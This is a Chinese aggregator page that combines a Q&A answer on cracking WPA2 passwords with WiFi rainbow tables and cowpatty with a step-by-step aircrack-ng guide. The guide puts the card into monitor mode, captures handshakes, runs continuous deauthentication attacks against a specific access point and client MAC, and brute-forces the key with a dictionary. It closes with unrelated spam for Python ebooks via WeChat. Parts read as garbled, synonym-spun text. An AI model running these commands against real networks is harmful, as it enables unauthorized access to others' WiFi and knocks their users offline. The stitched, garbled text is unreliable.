wpa2密码如何用彩虹表破解,cap文件如何提取hash值?liux系统中的网卡驱动如何安装?ping破解又是啥意思
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了wpa2密码如何用彩虹表破解,cap文件如何提取hash值?liux系统中的网卡驱动如何安装?ping破解又是啥意思相关的知识,希望对你有一定的参考价值。
彩虹表有很多种有专门破解WiFi的WiFi彩虹表你可以搜一下zeroone团队哪个4g的还有33g的哪个现在网上就能找到这两个cowpatty -d xxx.hash -r 1.cap -s ESSID
他这个表是hash后缀的。rt rtc rti哪个表不是干这个用的
ZerOne团队4g那个:
33G那个:
这就是用彩虹表破解wifi挺简单的,彩虹表速度也很快,一千万的密码三秒钟就能跑完,要是用aircrack或者hashcat跑要跑一个多小时hashcat能比aircrack快一点,再快也快不过彩虹表,不过这个表有点问题,直接对密码不行吗为什么要加个名字?不过wpa这种格式都是连名字一起算在一起的,没有名字还不行你可以搜一下pkm库哪个也算是彩虹表把,不过这个WiFi彩虹表和其他的不一样这个表具有单一性感觉有点垃圾把,要是别人wifi名字换了你这个表也就废了,要是别人光换个密码还行表还能用这也是缺点把
最主要的还是研究怎么提取密码哈希把,把cap里面的密码哈希提取出来用rti哪个表破解我试过用rti哪个表破解rar速度挺快的11位的纯数字密码两秒就出来了,提取rar密码哈希用rar2john这个软件,看这个软件的名字应该是一个叫赵恩的人发明的,我想问问赵恩大哥哥你能不能发明一下cap2john这个软件专门提取cap密码哈希然后用rti这个表跑一下。
不过wpa这种加密格式好像没有名字不行,所以基本没人做这种wpa彩虹表网上能找到的也就这两个少的可怜,也不知道赵恩大哥哥能不能发明一下cap2john或者wpa2john或者wifi2john如果发明的了应该会好不少,就是不知道提取的md5能不能用rti或者rtc格式的彩虹表破解,如果能破解就能方便很多
反正破解WiFi的彩虹表就那么两个你可以下载体验一下,33g哪个在网上还能找到种子文件,你要是不想用百度盘可以搜索种子用迅雷下载,好处是直接输入cap文件就行不需要md5缺点是需要名字,第二种方法怎么能从cap里面提取密码哈希这个到现在也找不到方法,也不知道赵恩大哥哥什么时候能发明一个cap2john如果这个软件发明出来能提取cap密码哈希就能直接用rti哪个表破解了 参考技术A 历史遗留问题
WiFi无线渗透 WPA2-PSK密码破解笔记
WPA/WPA2:
WPA/WPA2是一种比WEP强壮的加密算法,挑选这种安全类型,路由器将选用Radius服务器进行身份认证并得到密钥的WPA或WPA2安全形式。因为要架起一台专用的认证服务器,价值对比贵重且保护也很杂乱,所以不推荐不同用户运用此安全类型。
WPA-PSK/WPA2-PSK:
WPA-PSK/WPA2-PSK安全类型其实是WPA/WPA2的一种简化版本,它是依据同享密钥的WPA形式,安全性很高,设置也相对简单,适合不同家庭用户和小型企业运用。其详细设置:
认证类型:该项用来挑选体系选用的安全形式,即主动、WPA-PSK、WPA2-PSK。
主动:若挑选该项,路由器会依据主机恳求主动挑选WPA-PSK或WPA-PSK的安全形式。
加密算法:该项用来挑选对无线数据进行加密的安全算法,选项有主动、TKIP、AES。默许选项为主动,挑选该项后,路由器将依据实践需求主动挑选TKIP或AES加密办法。留意11N形式不支持TKIP算法。
PSK暗码:该项就是WPA-PSK/WPA2-PSK的初始密钥了,在设置是,需求为8-63个ASCII字符或者8-64个十六进制的字符。
组密钥更新周期:该项设置播送和组博密钥的定时更新,以秒为单位,最小值为30,若该值为0,问表示不进行更新。
使用Aircrack-ng抓取WPA2-PSK握手包
主要步骤:
1.设置无线网卡至监听模式 airmon-ng start wlan0
2.扫描周围WPA2-PSK加密的无线信号 airodump-ng wlan0mon
3.新建一个终端,抓取握手包 airodump-ng -c [num] -w wpa2 wlan0mon
需指定信道
4.等待过程中,发起DeAuth攻击,强制将客户端踢下线重连,抓取握手包:aireplay-ng -0 5 -a BSSID -c STATION wlan0mon
设置为发起5次攻击
如果想要不停的发起攻击就是这样aireplay-ng -0 0 -a BSSID -c STATION wlan0mon
我使用的网卡是TL-WN722N
此时需要让虚拟机连接网卡
连接成功后,输入ifconfig
会看到
然后输入airmon-ng start wlan0
成功后
开始监听(扫描周围的无线信号)
途中CN为信道
airodump-ng -c 信道 --bssid xxx -w 保存路径 wlan0mon
抓取目标的握手包
参数:—ivs -w FAN 保存ivs格式的包,名字为test —bssid 要破解ap的ssid
强制将客户端踢下线aireplay-ng -0 0 -a 目标的MAC地址 -c 目标客户端MAC wlan0mon
aireplay-ng -0 0 -a F4:83:CD:F6:15:72 -c 66:F6:84:88:3C:F1 wlan0mon
开始进行攻击,但是有时候该命令会报错。这是因为网卡会随机使用信道,信道不同,多尝试几次同样的命令直到成功就行了
如图所示就证明抓到了握手包
最后用好的字典爆破
开始破解密码,执行如下的命令,成功后就可以看到已经破解出的密码,如果密码复杂一点,可能需要时间
aircrack-ng -w 字典 保存的包
aircrack-ng -w 后面都是绝对路径
说实在的,每次在后台看到一些读者的回应都觉得很欣慰,我想把我收藏的一些编程干货贡献给大家,回馈每一个读者,希望能帮到你们。
干货主要有:
① 2000多本Python电子书(主流和经典的书籍应该都有了)
② Python标准库资料(最全中文版)
③ 项目源码(四五十个有趣且经典的练手项目及源码)
④ Python基础入门、爬虫、web开发、大数据分析方面的视频(适合小白学习)
⑤ Python所有知识点汇总(可以弄清楚Python的所有方向和技术)
如果你用得到的话可以直接拿走,有需要的朋友可以添加我的微信:difan159 或者yanle7758258 获取!
以上是关于wpa2密码如何用彩虹表破解,cap文件如何提取hash值?liux系统中的网卡驱动如何安装?ping破解又是啥意思的主要内容,如果未能解决你的问题,请参考以下文章